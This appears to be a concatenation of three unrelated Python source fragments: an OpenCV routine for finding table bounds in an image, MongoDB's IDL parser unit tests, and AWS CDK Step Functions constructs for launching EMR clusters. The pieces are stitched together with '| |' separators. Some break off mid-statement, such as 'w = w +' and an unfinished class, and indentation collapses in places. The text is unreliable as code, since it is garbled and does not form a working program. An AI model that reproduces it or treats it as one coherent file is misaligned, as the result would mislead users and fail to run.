return horizontal_base_line
def get_table_bounds(self):
'''
Get best possible table bounds
'''
table_bounds = None
image_gray = cv2.cvtColor(self.image_object, cv2.COLOR_BGR2GRAY)
temp_image, contours, hierarchy = cv2.findContours(image_gray,
cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
best_match_contour_index = None
max_contour_size = 0
count = 0
for contour in contours:
if cv2.contourArea(contour) > max_contour_size:
contour_size = cv2.contourArea(contour)
x, y, w, h = cv2.boundingRect(contour)
if x > 0 and y > 0 and contour_size > max_contour_size:
best_match_contour_index = count
max_contour_size = contour_size
count += 1
if best_match_contour_index:
x, y, w, h = cv2.boundingRect(contours[best_match_contour_index])
x = x - BUFFER_LENGTH
w = w + | |
<gh_stars>0
#!/usr/bin/env python3
#
# Copyright (C) 2018-present MongoDB, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the Server Side Public License, version 1,
# as published by MongoDB, Inc.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Server Side Public License for more details.
#
# You should have received a copy of the Server Side Public License
# along with this program. If not, see
# <http://www.mongodb.com/licensing/server-side-public-license>.
#
# As a special exception, the copyright holders give permission to link the
# code of portions of this program with the OpenSSL library under certain
# conditions as described in each individual source file and distribute
# linked combinations including the program with the OpenSSL library. You
# must comply with the Server Side Public License in all respects for
# all of the code used other than as permitted herein. If you modify file(s)
# with this exception, you may extend this exception to your version of the
# file(s), but you are not obligated to do so. If you do not wish to do so,
# delete this exception statement from your version. If you delete this
# exception statement from all source files in the program, then also delete
# it in the license file.
#
"""Test cases for IDL parser."""
# pylint: disable=too-many-lines
import textwrap
import unittest
# import package so that it works regardless of whether we run as a module or file
if __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.abspath(__file__)))
from context import idl
import testcase
else:
from .context import idl
from . import testcase
class TestParser(testcase.IDLTestcase):
# pylint: disable=too-many-public-methods
"""Test the IDL parser only."""
    def test_empty(self):
        # type: () -> None
        """Test an empty document works."""
        # An empty IDL file is valid and parses to nothing.
        self.assert_parse("")
    def test_root_negative(self):
        # type: () -> None
        """Test that an unknown root scalar fails."""
        # Only known root sections (global, types, structs, ...) are accepted.
        self.assert_parse_fail(
            textwrap.dedent("""
        fake:
            cpp_namespace: 'foo'
            """), idl.errors.ERROR_ID_UNKNOWN_ROOT)
    def test_global_positive(self):
        # type: () -> None
        """Positive global tests."""
        # cpp_namespace alone
        self.assert_parse(textwrap.dedent("""
        global:
            cpp_namespace: 'foo'"""))

        # cpp_includes scalar
        self.assert_parse(textwrap.dedent("""
        global:
            cpp_includes: 'foo'"""))

        # cpp_includes list
        self.assert_parse(
            textwrap.dedent("""
        global:
            cpp_includes:
                - 'bar'
                - 'foo'"""))
    def test_global_negative(self):
        # type: () -> None
        """Negative global tests."""

        # Global is a scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        global: foo
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # Duplicate globals
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_namespace: 'foo'
        global:
            cpp_namespace: 'bar'
            """), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # Duplicate cpp_namespace
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_namespace: 'foo'
            cpp_namespace: 'foo'"""), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # Duplicate cpp_includes
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_includes: 'foo'
            cpp_includes: 'foo'"""), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # cpp_namespace as a sequence
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_namespace:
                - 'foo'
                - 'bar'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # cpp_namespace as a map
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_namespace:
                name: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # cpp_includes as a map
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_includes:
                inc1: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE_SCALAR_OR_SEQUENCE)

        # cpp_includes as a sequence of tuples
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            cpp_includes:
                - inc1: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # Unknown scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        global:
            bar: 'foo'
            """), idl.errors.ERROR_ID_UNKNOWN_NODE)
    def test_type_positive(self):
        # type: () -> None
        """Positive type test cases."""

        # Test that all positive fields work
        self.assert_parse(
            textwrap.dedent("""
        types:
            foo:
                description: foo
                cpp_type: foo
                bson_serialization_type: foo
                serializer: foo
                deserializer: foo
                default: foo
                bindata_subtype: foo
            """))

        # Test sequence of bson serialization types
        self.assert_parse(
            textwrap.dedent("""
        types:
            foo:
                description: foo
                cpp_type: foo
                bson_serialization_type:
                    - foo
                    - bar
            """))
    def test_type_negative(self):
        # type: () -> None
        """Negative type test cases."""

        # Test duplicate types
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                description: test
                cpp_type: foo
                bson_serialization_type: int
        types:
            bar:
                description: test
                cpp_type: foo
                bson_serialization_type: int
            """), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # Test that a scalar type fails
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo: 'bar'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # Test unknown field
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                bogus: foo
                description: test
                cpp_type: foo
                bson_serialization_type:
            """), idl.errors.ERROR_ID_UNKNOWN_NODE)

        # test duplicate field
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                description: foo
                description: test
                cpp_type: foo
                bson_serialization_type:
            """), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # test list instead of scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            - foo:
            """), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)

        # test list instead of scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                - bar
            """), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)

        # test map instead of scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                description:
                    foo: bar
            """), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)

        # test missing bson_serialization_type field
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                description: foo
                cpp_type: foo
            """), idl.errors.ERROR_ID_MISSING_REQUIRED_FIELD)

        # test missing cpp_type field
        self.assert_parse_fail(
            textwrap.dedent("""
        types:
            foo:
                description: foo
                bson_serialization_type: foo
            """), idl.errors.ERROR_ID_MISSING_REQUIRED_FIELD)
    def test_struct_positive(self):
        # type: () -> None
        """Positive struct test cases."""

        # All fields with true for bools
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: true
                immutable: true
                inline_chained_structs: true
                generate_comparison_operators: true
                cpp_validator_func: funcName
                fields:
                    foo: bar
            """))

        # All fields with false for bools
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                immutable: false
                inline_chained_structs: false
                generate_comparison_operators: false
                cpp_validator_func: funcName
                fields:
                    foo: bar
            """))

        # Missing fields section is allowed
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: true
            """))
    def test_struct_negative(self):
        # type: () -> None
        """Negative struct test cases."""

        # Struct as a scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo: foo
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # unknown field
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                foo: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_UNKNOWN_NODE)

        # strict is a bool
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # immutable is a bool
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                immutable: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # inline_chained_structs is a bool
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                inline_chained_structs: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # generate_comparison_operators is a bool
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                generate_comparison_operators: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # cpp_name is not allowed on structs
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                cpp_name: bar
                fields:
                    foo: bar
            """), idl.errors.ERROR_ID_UNKNOWN_NODE)
    def test_variant_positive(self):
        # type: () -> None
        """Positive variant test cases."""

        # Variant types may be given inline or as a sequence.
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    my_variant_field1:
                        type:
                            variant: [int, string]
                    my_variant_field2:
                        type:
                            variant:
                            - string
                            - array<string>
                            - object
            """))
    def test_variant_negative(self):
        # type: () -> None
        """Negative variant test cases."""

        # variant must not be a map
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    my_variant_field:
                        type:
                            variant: {}
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # variant must not be a scalar
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    my_variant_field:
                        type:
                            variant: 1
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # no extra keys next to variant
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    my_variant_field:
                        type:
                            variant: []
                            unknown_option: true
            """), idl.errors.ERROR_ID_UNKNOWN_NODE)

        # nested variants are not supported
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    my_variant_field:
                        type:
                            variant:
                            - string
                            - {variant: [string, int]}
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # comparison operators cannot be generated for variant fields
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                generate_comparison_operators: true
                fields:
                    my_variant_field:
                        type:
                            variant: [string, int]
            """), idl.errors.ERROR_ID_VARIANT_COMPARISON)
    def test_field_positive(self):
        # type: () -> None
        """Positive field test cases."""

        # Test short form (field name maps directly to a type)
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    foo: short
            """))

        # Test all fields
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                fields:
                    foo:
                        type: foo
                        description: foo
                        optional: true
                        ignore: true
                        cpp_name: bar
                        comparison_order: 3
                        unstable: true
            """))

        # Test false bools
        self.assert_parse(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        optional: false
                        ignore: false
                        unstable: false
            """))
    def test_field_negative(self):
        # type: () -> None
        """Negative field test cases."""

        # Test duplicate fields
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo: short
                    foo: int
            """), idl.errors.ERROR_ID_DUPLICATE_NODE)

        # Test bad bool (optional)
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        optional: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # Test bad bool (ignore)
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        ignore: bar
            """), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)

        # Test bad int scalar (sequence is not an int)
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        comparison_order:
                            - a
                            - b
            """), idl.errors.ERROR_ID_IS_NODE_TYPE)

        # Test bad int (float is not an int)
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        comparison_order: 3.14159
            """), idl.errors.ERROR_ID_IS_NODE_VALID_INT)

        # Test bad negative int
        self.assert_parse_fail(
            textwrap.dedent("""
        structs:
            foo:
                description: foo
                strict: false
                fields:
                    foo:
                        type: string
                        comparison_order: -1
            """), idl.errors.ERROR_ID_IS_NODE_VALID_NON_NEGATIVE_INT)
def test_name_collisions_negative(self):
# type: () -> None
"""Negative tests for type collisions."""
# Struct after type
self.assert_parse_fail(
textwrap.dedent("""
types:
foo1:
description: foo
cpp_type: foo
bson_serialization_type: string
serializer: foo
deserializer: foo
default: foo
structs:
foo1:
description: foo
strict: true
fields:
foo: string
"""), idl.errors.ERROR_ID_DUPLICATE_SYMBOL)
# Type after struct
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo1:
description: foo
strict: true
fields:
foo: string
types:
foo1:
description: foo
cpp_type: foo
bson_serialization_type: string
serializer: foo
deserializer: foo
| |
from typing import Any, Dict, List, Mapping, Optional
from aws_cdk import aws_events as events
from aws_cdk import aws_iam as iam
from aws_cdk import aws_lambda
from aws_cdk import aws_secretsmanager as secretsmanager
from aws_cdk import aws_stepfunctions as sfn
from aws_cdk import aws_stepfunctions_tasks as sfn_tasks
from aws_cdk import core
from aws_emr_launch.constructs.base import BaseBuilder
from aws_emr_launch.constructs.emr_constructs import emr_code
from aws_emr_launch.constructs.iam_roles import emr_roles
from aws_emr_launch.constructs.lambdas import emr_lambdas
class BaseTask(sfn.TaskStateBase):
    """Common plumbing for the EMR Step Functions task states.

    Extends ``sfn.TaskStateBase`` with helpers to build service-integration
    resource ARNs and to render the shared ``Task`` state fields (timeout,
    heartbeat, input/output/result paths) into the state-machine JSON.
    """

    def __init__(self, scope: core.Construct, id: str, *,
                 comment: Optional[str] = None,
                 heartbeat: Optional[core.Duration] = None,
                 input_path: Optional[str] = None,
                 integration_pattern: Optional[sfn.IntegrationPattern] = None,
                 output_path: Optional[str] = None,
                 result_path: Optional[str] = None,
                 timeout: Optional[core.Duration] = None,):
        super().__init__(
            scope, id,
            comment=comment,
            heartbeat=heartbeat,
            input_path=input_path,
            integration_pattern=integration_pattern,
            output_path=output_path,
            result_path=result_path,
            timeout=timeout)

        # Keep our own copies so _render_task_base() can read them later
        # (presumably the base class does not expose them — TODO confirm
        # against the installed aws_cdk version).
        self._heartbeat = heartbeat
        self._timeout = timeout

    @staticmethod
    def get_resource_arn(
            service: str, api: str,
            integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB) -> str:
        """Build ``arn:<partition>:states:::<service>:<api><suffix>`` where the
        suffix encodes the integration pattern ('' / '.sync' /
        '.waitForTaskToken').

        Raises:
            ValueError: if service or api is empty.
        """
        if not service or not api:
            raise ValueError('Both "service" and "api" are required to build the resource ARN')

        resource_arn_suffixes = {
            sfn.IntegrationPattern.REQUEST_RESPONSE: '',
            sfn.IntegrationPattern.RUN_JOB: '.sync',
            sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN: '.waitForTaskToken'
        }

        return f'arn:{core.Aws.PARTITION}:states:::{service}:{api}{resource_arn_suffixes[integration_pattern]}'

    @staticmethod
    def render_json_path(json_path: Optional[str]) -> Optional[str]:
        """Normalize a JSONPath for the rendered state: None/DISCARD become
        None (field omitted); anything else must start with '$'.

        Raises:
            ValueError: if json_path does not start with '$'.
        """
        if json_path is None:
            return None
        elif json_path == sfn.JsonPath.DISCARD:
            return None

        if not json_path.startswith('$'):
            raise ValueError(f"Expected JSON path to start with '$', got: {json_path}")

        return json_path

    def _render_task_base(self) -> Mapping[Any, Any]:
        """Render the common Task-state fields, dropping None-valued keys so
        they are omitted from the state machine definition."""
        task = {
            'Type': 'Task',
            'Comment': self._comment,
            'TimeoutSeconds': self._timeout.to_seconds() if self._timeout else None,
            'HeartbeatSeconds': self._heartbeat.to_seconds() if self._heartbeat else None,
            'InputPath': self.render_json_path(self._input_path),
            'OutputPath': self.render_json_path(self._output_path),
            'ResultPath': self.render_json_path(self._result_path),
        }
        return {k: v for k, v in task.items() if v is not None}

    def _when_bound_to_graph(self, graph: sfn.StateGraph) -> None:
        # Register this task's IAM policy statements on the state-machine
        # graph in addition to the base-class bookkeeping.
        super()._when_bound_to_graph(graph)
        for policy_statement in self._task_policies():
            graph.register_policy_statement(policy_statement)
class StartExecutionTask(BaseTask):
    """Task state that starts an execution of another state machine.

    With IntegrationPattern.RUN_JOB the task additionally needs permission to
    poll/stop the child execution and to manage the CloudWatch Events rule
    Step Functions uses to track its completion.
    """

    def __init__(self, scope: core.Construct, id: str, *,
                 comment: Optional[str] = None,
                 heartbeat: Optional[core.Duration] = None,
                 input_path: Optional[str] = None,
                 integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
                 output_path: Optional[str] = None,
                 result_path: Optional[str] = None,
                 timeout: Optional[core.Duration] = None,
                 state_machine: sfn.StateMachine,
                 input: Optional[Dict[str, Any]] = None, name: Optional[str] = None,):
        """Create the task.

        Args:
            state_machine: the child state machine to start.
            input: literal input for the child; defaults to forwarding the
                whole parent execution input ($$.Execution.Input).
            name: optional execution name.
        """
        super().__init__(scope, id,
                         comment=comment,
                         heartbeat=heartbeat,
                         input_path=input_path,
                         integration_pattern=integration_pattern,
                         output_path=output_path,
                         result_path=result_path,
                         timeout=timeout)
        self._state_machine = state_machine
        self._input = input
        self._name = name
        self._integration_pattern = integration_pattern
        self._metrics = None
        self._statements = self._create_policy_statements()

    def _create_policy_statements(self) -> List[iam.PolicyStatement]:
        """IAM statements required by the state machine role for this task."""
        stack = core.Stack.of(self)

        policy_statements = list()

        policy_statements.append(
            iam.PolicyStatement(
                effect=iam.Effect.ALLOW,
                actions=['states:StartExecution'],
                resources=[self._state_machine.state_machine_arn]
            )
        )

        if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
            # RUN_JOB polls the child and uses an Events rule to detect
            # completion, so extra permissions are required.
            policy_statements.append(
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=['states:DescribeExecution', 'states:StopExecution'],
                    resources=['*']
                )
            )

            policy_statements.append(
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
                    resources=[stack.format_arn(
                        service='events',
                        resource='rule',
                        resource_name='StepFunctionsGetEventsForStepFunctionsExecutionRule'
                    )]
                )
            )

        return policy_statements

    def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
        return self._metrics

    def _task_policies(self) -> List[iam.PolicyStatement]:
        return self._statements

    def to_state_json(self) -> Mapping[Any, Any]:
        """Render the Amazon States Language JSON for this state."""
        # Renamed from `input`: avoid shadowing the builtin.
        execution_input = (self._input if self._input is not None
                           else sfn.TaskInput.from_context_at('$$.Execution.Input').value)

        task = {
            'Resource': self.get_resource_arn('states', 'startExecution', self._integration_pattern),
            'Parameters': sfn.FieldUtils.render_object({
                'StateMachineArn': self._state_machine.state_machine_arn,
                'Input': execution_input,
                'Name': self._name
            }),
        }
        task.update(self._render_next_end())
        task.update(self._render_retry_catch())
        task.update(self._render_task_base())
        return task
class EmrCreateClusterTask(BaseTask):
    """Task state that starts an EMR cluster via the RunJobFlow integration.

    Every RunJobFlow parameter is forwarded from the state input
    (``$.<Name>`` / ``$.Instances.<Name>``), so the cluster definition is
    entirely data-driven. The only fixed value is
    ``KeepJobFlowAliveWhenNoSteps = True`` so steps can be submitted after
    the cluster starts. The key tables below replace ~150 lines of repeated
    ``sfn.TaskInput.from_data_at(...)`` boilerplate in the original.
    """

    # RunJobFlow parameters forwarded from the state input, listed in the
    # order they appear in the rendered Parameters object.
    _KEYS_BEFORE_INSTANCES = (
        'AdditionalInfo', 'AmiVersion', 'Applications', 'AutoScalingRole',
        'BootstrapActions', 'Configurations', 'CustomAmiId',
        'EbsRootVolumeSize')
    _INSTANCES_KEYS = (
        'AdditionalMasterSecurityGroups', 'AdditionalSlaveSecurityGroups',
        'Ec2KeyName', 'Ec2SubnetId', 'Ec2SubnetIds',
        'EmrManagedMasterSecurityGroup', 'EmrManagedSlaveSecurityGroup',
        'HadoopVersion', 'InstanceCount', 'InstanceFleets', 'InstanceGroups',
        'MasterInstanceType', 'Placement', 'ServiceAccessSecurityGroup',
        'SlaveInstanceType', 'TerminationProtected')
    _KEYS_AFTER_INSTANCES = (
        'JobFlowRole', 'KerberosAttributes', 'LogUri', 'ManagedScalingPolicy',
        'Name', 'NewSupportedProducts', 'ReleaseLabel', 'RepoUpgradeOnBoot',
        'ScaleDownBehavior', 'SecurityConfiguration', 'ServiceRole',
        'StepConcurrencyLevel', 'SupportedProducts', 'Tags',
        'VisibleToAllUsers')

    def __init__(self, scope: core.Construct, id: str, *,
                 comment: Optional[str] = None,
                 heartbeat: Optional[core.Duration] = None,
                 input_path: Optional[str] = None,
                 integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
                 output_path: Optional[str] = None,
                 result_path: Optional[str] = None,
                 timeout: Optional[core.Duration] = None,
                 roles: emr_roles.EMRRoles,):
        """Create the task; `roles` supplies the EMR service/instance/autoscaling roles."""
        super().__init__(scope, id,
                         comment=comment,
                         heartbeat=heartbeat,
                         input_path=input_path,
                         integration_pattern=integration_pattern,
                         output_path=output_path,
                         result_path=result_path,
                         timeout=timeout)
        self._roles = roles
        self._integration_pattern = integration_pattern
        self._metrics = None
        self._statements = self._create_policy_statements()

    def _create_policy_statements(self) -> List[iam.PolicyStatement]:
        """IAM statements required by the state machine role for this task."""
        stack = core.Stack.of(self)

        policy_statements = list()

        policy_statements.append(
            iam.PolicyStatement(
                actions=[
                    'elasticmapreduce:RunJobFlow',
                    'elasticmapreduce:DescribeCluster',
                    'elasticmapreduce:TerminateJobFlows'
                ],
                resources=['*']
            )
        )

        # EMR assumes these roles on our behalf, so PassRole is required.
        policy_statements.append(
            iam.PolicyStatement(
                actions=['iam:PassRole'],
                resources=[
                    self._roles.service_role.role_arn,
                    self._roles.instance_role.role_arn,
                    self._roles.autoscaling_role.role_arn
                ]
            )
        )

        if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
            policy_statements.append(
                iam.PolicyStatement(
                    actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
                    resources=[stack.format_arn(
                        service='events',
                        resource='rule',
                        resource_name='StepFunctionsGetEventForEMRRunJobFlowRule'
                    )]
                )
            )

        return policy_statements

    def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
        return self._metrics

    def _task_policies(self) -> List[iam.PolicyStatement]:
        return self._statements

    def to_state_json(self) -> Mapping[Any, Any]:
        """Render the Amazon States Language JSON for this state."""
        def from_data(path: str):
            # Resolve a JSON path against the state input at execution time.
            return sfn.TaskInput.from_data_at(path).value

        instances = {key: from_data('$.Instances.' + key)
                     for key in self._INSTANCES_KEYS}
        # Keep the cluster alive after bootstrap so steps can be added later.
        instances['KeepJobFlowAliveWhenNoSteps'] = True

        parameters = {key: from_data('$.' + key)
                      for key in self._KEYS_BEFORE_INSTANCES}
        parameters['Instances'] = instances
        parameters.update(
            (key, from_data('$.' + key)) for key in self._KEYS_AFTER_INSTANCES)

        task = {
            'Resource': self.get_resource_arn('elasticmapreduce', 'createCluster', self._integration_pattern),
            'Parameters': sfn.FieldUtils.render_object(parameters),
        }
        task.update(self._render_next_end())
        task.update(self._render_retry_catch())
        task.update(self._render_task_base())
        return task
class EmrAddStepTask(BaseTask):
    """Task state that submits a single step to a running EMR cluster."""

    def __init__(self, scope: core.Construct, id: str, *,
                 comment: Optional[str] = None,
                 heartbeat: Optional[core.Duration] = None,
                 input_path: Optional[str] = None,
                 integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
                 output_path: Optional[str] = None,
                 result_path: Optional[str] = None,
                 timeout: Optional[core.Duration] = None,
                 cluster_id: str, step: Dict[str, Any],):
        """Create the task.

        Args:
            cluster_id: EMR cluster (job flow) id to add the step to.
            step: EMR Step definition dict passed through to AddJobFlowSteps.
        """
        super().__init__(scope, id,
                         comment=comment,
                         heartbeat=heartbeat,
                         input_path=input_path,
                         integration_pattern=integration_pattern,
                         output_path=output_path,
                         result_path=result_path,
                         timeout=timeout)
        self._cluster_id = cluster_id
        self._step = step
        self._integration_pattern = integration_pattern
        self._metrics = None
        self._statements = self._create_policy_statements()

    def _create_policy_statements(self) -> List[iam.PolicyStatement]:
        """IAM statements required by the state machine role for this task."""
        stack = core.Stack.of(self)

        policy_statements = list()

        policy_statements.append(
            iam.PolicyStatement(
                effect=iam.Effect.ALLOW,
                actions=[
                    'elasticmapreduce:AddJobFlowSteps',
                    'elasticmapreduce:DescribeStep',
                    'elasticmapreduce:CancelSteps'
                ],
                # Fixed: use the deployment partition instead of hard-coding
                # 'aws' (consistent with get_resource_arn; required for
                # aws-cn / aws-us-gov partitions).
                resources=[
                    f'arn:{core.Aws.PARTITION}:elasticmapreduce:'
                    f'{core.Aws.REGION}:{core.Aws.ACCOUNT_ID}:cluster/*']
            )
        )

        if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
            policy_statements.append(
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
                    resources=[stack.format_arn(
                        service='events',
                        resource='rule',
                        resource_name='StepFunctionsGetEventForEMRAddJobFlowStepsRule'
                    )]
                )
            )

        return policy_statements

    def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
        return self._metrics

    def _task_policies(self) -> List[iam.PolicyStatement]:
        return self._statements

    def to_state_json(self) -> Mapping[Any, Any]:
        """Render the Amazon States Language JSON for this state."""
        task = {
            'Resource': self.get_resource_arn('elasticmapreduce', 'addStep', self._integration_pattern),
            'Parameters': sfn.FieldUtils.render_object({
                'ClusterId': self._cluster_id,
                'Step': self._step
            }),
        }
        task.update(self._render_next_end())
        task.update(self._render_retry_catch())
        task.update(self._render_task_base())
        return task
class LoadClusterConfigurationBuilder:
    """Builds a LambdaInvoke task that loads the stored cluster configuration."""

    @staticmethod
    def build(scope: core.Construct, id: str, *,
              cluster_name: str,
              cluster_tags: List[core.Tag],
              profile_namespace: str,
              profile_name: str,
              configuration_namespace: str,
              configuration_name: str,
              output_path: Optional[str] = None,
              result_path: Optional[str] = None) -> sfn.Task:
        # Nest everything under one Construct so Lambda/Task ids cannot
        # collide with sibling constructs.
        nested = core.Construct(scope, id)

        loader_fn = emr_lambdas.LoadClusterConfigurationBuilder.build(
            nested,
            profile_namespace=profile_namespace,
            profile_name=profile_name,
            configuration_namespace=configuration_namespace,
            configuration_name=configuration_name)

        payload = {
            'ClusterName': cluster_name,
            'ClusterTags': [{'Key': tag.key, 'Value': tag.value} for tag in cluster_tags],
            'ProfileNamespace': profile_namespace,
            'ProfileName': profile_name,
            'ConfigurationNamespace': configuration_namespace,
            'ConfigurationName': configuration_name,
        }

        return sfn_tasks.LambdaInvoke(
            nested, 'Load Cluster Configuration',
            output_path=output_path,
            result_path=result_path,
            lambda_function=loader_fn,
            payload_response_only=True,
            payload=sfn.TaskInput.from_object(payload),
        )
class OverrideClusterConfigsBuilder:
    """Builds a LambdaInvoke task that applies allowed overrides to the cluster config."""

    @staticmethod
    def build(scope: core.Construct, id: str, *,
              override_cluster_configs_lambda: Optional[aws_lambda.Function] = None,
              allowed_cluster_config_overrides: Optional[Dict[str, str]] = None,
              input_path: str = '$',
              output_path: Optional[str] = None,
              result_path: Optional[str] = None) -> sfn.Task:
        # Nest everything under one Construct so Lambda/Task ids cannot
        # collide with sibling constructs.
        nested = core.Construct(scope, id)

        # Fall back to the shared singleton Lambda unless the caller
        # supplied one.
        if override_cluster_configs_lambda is None:
            override_fn = emr_lambdas.OverrideClusterConfigsBuilder.get_or_build(nested)
        else:
            override_fn = override_cluster_configs_lambda

        return sfn_tasks.LambdaInvoke(
            nested, 'Override Cluster Configs',
            output_path=output_path,
            result_path=result_path,
            lambda_function=override_fn,
            payload_response_only=True,
            payload=sfn.TaskInput.from_object({
                'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
                'Input': sfn.TaskInput.from_data_at(input_path).value,
                'AllowedClusterConfigOverrides': allowed_cluster_config_overrides
            }),
        )
class FailIfClusterRunningBuilder:
    """Builds a LambdaInvoke task that fails the execution if the named cluster is already running."""

    @staticmethod
    def build(scope: core.Construct, id: str, *,
              default_fail_if_cluster_running: bool,
              input_path: str = '$',
              output_path: Optional[str] = None,
              result_path: Optional[str] = None) -> sfn.Task:
        # Nest everything under one Construct so Lambda/Task ids cannot
        # collide with sibling constructs.
        nested = core.Construct(scope, id)

        checker_fn = emr_lambdas.FailIfClusterRunningBuilder.get_or_build(nested)

        return sfn_tasks.LambdaInvoke(
            nested, 'Fail If Cluster Running',
            output_path=output_path,
            result_path=result_path,
            lambda_function=checker_fn,
            payload_response_only=True,
            payload=sfn.TaskInput.from_object({
                'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
                'DefaultFailIfClusterRunning': default_fail_if_cluster_running,
                'Input': sfn.TaskInput.from_data_at(input_path).value
            }),
        )
class UpdateClusterTagsBuilder:
    """Builds a LambdaInvoke task that merges execution-time tags into the cluster config."""

    @staticmethod
